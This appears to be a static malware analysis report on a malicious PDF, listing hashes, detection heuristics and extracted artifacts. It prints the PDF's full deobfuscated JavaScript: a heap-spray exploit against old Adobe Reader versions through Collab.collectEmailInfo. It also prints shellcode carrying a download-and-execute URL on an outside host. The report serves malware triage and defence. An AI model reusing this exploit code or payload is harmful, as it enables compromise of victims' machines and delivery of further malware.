Malicious PDF — malware analysis report

Static analysis result for SHA-256 b11050f9fbba5fdd…

MALICIOUS

PDF

2.9 KB Created: 2008-08-06 01:42:27 Authoring application: Scribus 1.3.3.12 (via Scribus PDF Library 1.3.3.12) First seen: 2026-05-08
MD5: 64f47978262e772a4ddbab3320e8f7c6 SHA-1: 989afac80374286f158faceda2b655be42eed049 SHA-256: b11050f9fbba5fddb9de024bda14b5c9a08ad130440813c471ef2b7130c57c71
250 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell

The PDF file contains embedded JavaScript, indicated by multiple PDF_JAVASCRIPT and PDF_JS heuristic firings. The presence of PDF_UNESCAPE and the extracted artifact 'javascript_obj0013_001.js' suggest that the JavaScript is obfuscated and likely performs malicious actions such as downloading and executing a second-stage payload. The authoring application 'Scribus' is not inherently malicious, but the combination of PDF structure and obfuscated JavaScript points to a suspicious document.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 7

  • JavaScript action low 4 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Obfuscated multi-stage PDF JavaScript heap-spray exploit critical CVE related PDF_JS_OBFUSCATED_MULTISTAGE_HEAPSPRAY
    PDF JavaScript hidden behind nested stream filters and/or a custom in-JS decoder (rolling-XOR stager) decodes to a heap-spray / ROP chain. The spray is only visible after unwinding those layers, which is why the raw heap-spray rules miss it. This is an obfuscated multi-stage Adobe Reader JavaScript exploit; the dropped Windows payload (often named Win.Trojan.Agent by signature AV) is the second stage, not the delivery mechanism.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
       var jCXXyks0apEMb5 = unescape("%u9090%u9090%u9090%u0FEB%u335B%u66C9%u80B9%u8001%u1133%uE243%uEBFA%uE805%uFFEC%uFFFF%u7581%u21B0%u1111%u9A11%u1D51%u619A%uBC0D%u619A%u9019%u11FD%u1115%u9A11%u47FD%u9F79%u1F5F%uF9FD%u11EF%u1111%u5498%u4715%u8979%u9BEF%uF91F%u11E1%u1111%u5498%u4719%u3479%uEEA1%uF9D3%u11F3%u1111%u5498%u471D%uFE79%uF1DF%uF971%u11C5%u1111%u5498%u4701%uD079%uF468%uF9A9%u11D7%u1111%u5498%u5105%u2991%u64D2%u98EB%u0954%u16F8%u1110%u4F11%u6498%u9A35%u1554%u107B%u9A48%u0944%uF947%u119A%u11 …
  • PDF exploit shellcode contains an embedded download URL high PDF_JS_SHELLCODE_DOWNLOAD_URL
    Decoded PDF exploit shellcode contains a hardcoded http(s) URL — stored as little-endian %uXXXX Unicode escapes, or hex-encoded in a document metadata field (/CreationDate, /Title) and referenced from the decoded script. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://85.17.166.231/gtest2/load.php?id=0&e=01&sid= Referenced by PDF JavaScript

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
javascript_obj0013_001.js pdf-javascript-stream PDF /JS object 13 at offset 0x364 3038 bytes
SHA-256: 35460fe3e559ca27c454c2fcd795045350b3b9a76d2556d5b3f6fbb3b3c91ce9
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 3 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
function DjJmix() {	var pi7gOdduvnlYo = new Array(); 
		function BtrQb(D6OnE882q, semCKA) { 
			while (D6OnE882q.length*2<semCKA){D6OnE882q += D6OnE882q;} 
			D6OnE882q = D6OnE882q.substring(0,semCKA/2);
			return D6OnE882q; 
		}

		function K6llqKaeLTVl6X() { 
			var Ww1P49 = 0x0c0c0c0c; 
			var jCXXyks0apEMb5 = unescape("%u9090%u9090%u9090%u0FEB%u335B%u66C9%u80B9%u8001%u1133%uE243%uEBFA%uE805%uFFEC%uFFFF%u7581%u21B0%u1111%u9A11%u1D51%u619A%uBC0D%u619A%u9019%u11FD%u1115%u9A11%u47FD%u9F79%u1F5F%uF9FD%u11EF%u1111%u5498%u4715%u8979%u9BEF%uF91F%u11E1%u1111%u5498%u4719%u3479%uEEA1%uF9D3%u11F3%u1111%u5498%u471D%uFE79%uF1DF%uF971%u11C5%u1111%u5498%u4701%uD079%uF468%uF9A9%u11D7%u1111%u5498%u5105%u2991%u64D2%u98EB%u0954%u16F8%u1110%u4F11%u6498%u9A35%u1554%u107B%u9A48%u0944%uF947%u119A%u1111%u7941%u0B27%u613E%u86F9%u1111%u9811%u0D54%uD49A%uD192%u9841%u3154%uEE79%u1111%u4111%u549A%u7B05%u4813%u449A%uF909%u1170%u1111%u5412%uD631%u4D11%u3F6F%uD674%u1551%u7469%u1111%u64EE%u9A31%u1D54%u107B%u9A48%u0944%u51F9%u1111%u7B11%u4916%u5412%u2235%u42CA%uEE42%u3164%u4241%u549A%u7B0D%u4814%u449A%uF909%u1132%u1111%u117B%u64EE%u9A31%u1954%u137B%u9A48%u0944%u01F9%u1111%u7B11%u9AEE%u0154%u107B%u9A48%u0944%u11F9%u1111%u5011%u434A%uF012%uF012%uF012%uF012%uFD92%u4B15%u9A42%uF3CB%u43E6%uF1EE%u9A44%u9AFD%u196C%u4C9A%u471D%u629A%u9A2D%u0F65%u1269%u47E2%u679A%u1231%u22E2%u58D8%uBC50%uD212%u2247%u1EE7%u01AF%uE32B%u1965%uDFD0%u121C%u51E3%uE0FA%uEF2A%u644F%u4BF4%uFA9A%u4B9A%u1235%u77CC%u1D9A%u9A5A%u0D4B%uCC12%u159A%u129A%u4FD4%uD34C%u1119%uE5F9%uEEEF%u44EE%u5D43%u5E5C%u115F%u7468%u7074%u2F3A%u382F%u2E35%u3731%u312E%u3636%u322E%u3133%u672F%u6574%u7473%u2F32%u6F6C%u6461%u702E%u7068%u693F%u3D64%u2630%u3D65%u3130%u7326%u6469%u003D");
			var M2vi2Lm0mgMK = 0x400000;
			var c57Uewi2 = jCXXyks0apEMb5.length * 2;
			var semCKA = M2vi2Lm0mgMK - (c57Uewi2+0x38);
			var D6OnE882q = unescape("%u9090%u9090");
			D6OnE882q = BtrQb(D6OnE882q, semCKA);
			var fhjXkOmY9YZ5H = (Ww1P49 - 0x400000)/M2vi2Lm0mgMK;
			
			for (var mj3eEo=0;mj3eEo<fhjXkOmY9YZ5H;mj3eEo++) { 
				pi7gOdduvnlYo[mj3eEo] = D6OnE882q + jCXXyks0apEMb5;
			}
		}

		function e5lBk8VzS() {
			var NwE3f = app.viewerVersion.toString();
			NwE3f = NwE3f.replace(/\D/g,"");
			var STxK1hjmGs = new Array(NwE3f.charAt(0),NwE3f.charAt(1),NwE3f.charAt(2));
			var aEf471t4dJOL = "c8o8l5l555e2c424t234534E6ma45678il31In1f3457o";
			if ((STxK1hjmGs[0] == 8 &&
			((STxK1hjmGs[1] == 1 && STxK1hjmGs[2] < 2) || STxK1hjmGs[1] < 1)) || 
			(STxK1hjmGs[0] == 7 && STxK1hjmGs[1] < 1) || 
			(STxK1hjmGs[0] < 7)) {
			        var tirZO8Ar6V = Collab;
				K6llqKaeLTVl6X();
				var gwdQLhBXRJ4Rl = unescape("%u0c0c%u0c0c");
				var dnozEaclJTLhbV = "c24ol2la572bS8to2445r5e00";
				while(gwdQLhBXRJ4Rl.length < 44952) gwdQLhBXRJ4Rl += gwdQLhBXRJ4Rl;
				this[dnozEaclJTLhbV.replace(new RegExp(/\d/g),"")] = tirZO8Ar6V[aEf471t4dJOL.replace(new RegExp(/\d/g),"")](                  {subj:            "",        msg:              gwdQLhBXRJ4Rl});
			} 
		}
		e5lBk8VzS();}
javascript_obj0013_001_shellcode_00.bin pdf-js-shellcode pdf-js-unescape-shellcode recovered from PDF /JS object 13 at offset 0x364 464 bytes
SHA-256: d792dbee0b7e8970c65ec781f7c0e1244e3d0b09e1740c3fa42d8f511e8b9028